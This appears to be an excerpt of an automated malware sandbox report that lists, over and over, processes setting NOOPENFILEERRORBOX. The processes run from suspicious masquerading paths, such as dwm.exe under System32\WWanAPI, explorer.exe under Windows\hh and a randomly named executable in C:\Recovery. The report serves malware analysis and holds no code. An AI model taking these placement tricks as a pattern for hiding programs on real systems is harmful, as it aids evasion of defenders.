Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ShellNew\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\jOMfQSwRhTi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
